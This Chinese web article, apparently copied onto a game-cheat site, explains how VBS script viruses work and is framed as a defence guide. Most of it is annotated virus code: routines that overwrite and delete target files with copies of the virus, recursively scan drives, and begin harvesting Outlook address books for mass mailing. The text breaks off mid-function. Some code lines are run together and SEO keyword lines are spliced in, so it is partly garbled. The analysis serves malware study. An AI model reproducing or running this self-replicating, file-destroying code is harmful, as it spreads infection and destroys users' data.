禁用vbs脚本 VBS脚本病毒特点及如何防范「建议收藏」

11/28 02:07:15 来源网站:268辅助卡盟网

以下是文件感染的部分关键代码:

Set fso=createobject("scripting.filesystemobject")

'创建一个文件系统对象

set self=fso.opentextfile(wscript.scriptfullname,1)

'读打开当前文件(即病毒本身)

vbscopy=self.readall

' 读取病毒全部代码到字符串变量vbscopy……

set ap=fso.opentextfile(目标文件.path,2,true)

' 写打开目标文件,准备写入病毒代码

ap.write vbscopy ' 将病毒代码覆盖目标文件

ap.close

禁用vbs脚本_vbs脚本 教程_vbs病毒脚本

set cop=fso.getfile(目标文件.path) '得到目标文件路径

cop.copy(目标文件.path & ".vbs")

' 创建另外一个病毒文件(以.vbs为后缀)

目标文件.delete(true)

'删除目标文件

上面描述了病毒文件是如何感染正常文件的:首先将病毒自身代码赋给字符串变量vbscopy,然后将这个字符串覆盖写到目标文件,并创建一个以目标文件名为文件名前缀、vbs为后缀的文件副本,最后删除目标文件。

下面我们具体分析一下文件搜索代码:

'该函数主要用来寻找满足条件的文件,并生成对应文件的一个病毒副本

sub scan(folder_) 'scan函数定义,

on error resume next '如果出现错误,直接跳过,防止弹出错误窗口

set folder_=fso.getfolder(folder_)

set files=folder_.files ' 当前目录的所有文件集合

for each file in filesext=fso.GetExtensionName(file)

'获取文件后缀

ext=lcase(ext) '后缀名转换成小写字母

if ext="mp5" then '如果后缀名是mp5,则进行感染。

请自己建立相应后缀名的文件,最好是非正常后缀名 ,以免破坏正常程序。

Wscript.echo (file)

end ifnextset subfolders=folder_.subfoldersfor each subfolder in subfolders '搜索其他目录;递归调用

scan( ) scan(subfolder)

next

end sub

上面的代码就是VBS脚本病毒进行文件搜索的代码分析。搜索部分scan( )函数做得比较短小精悍,非常巧妙,采用了一个递归的算法遍历整个分区的目录和文件。

2.vbs脚本病毒通过网络传播的几种方式及代码分析

VBS脚本病毒之所以传播范围广,主要依赖于它的网络传播功能,一般来说,VBS脚本病毒采用如下几种方式进行传播:

1)通过Email附件传播

这是一种用的非常普遍的传播方式,病毒可以通过各种方法拿到合法的Email地址,最常见的就是直接取outlook地址簿中的邮件地址,也可以通过程序在用户文档(譬如htm文件)中搜索Email地址。

下面我们具体分析一下VBS脚本病毒是如何做到这一点的:

Function mailBroadcast()

on error resume next

wscript.echo

vbs病毒脚本_vbs脚本 教程_禁用vbs脚本

Set outlookApp = CreateObject("Outlook.Application")

//创建一个OUTLOOK应用的对象

If outlookApp= "Outlook" Then

Set mapiObj=outlookApp.GetNameSpace("MAPI")

//获取MAPI的名字空间

    暂无相关资讯
禁用vbs脚本 VBS脚本病毒特点及如何防范「建议收藏」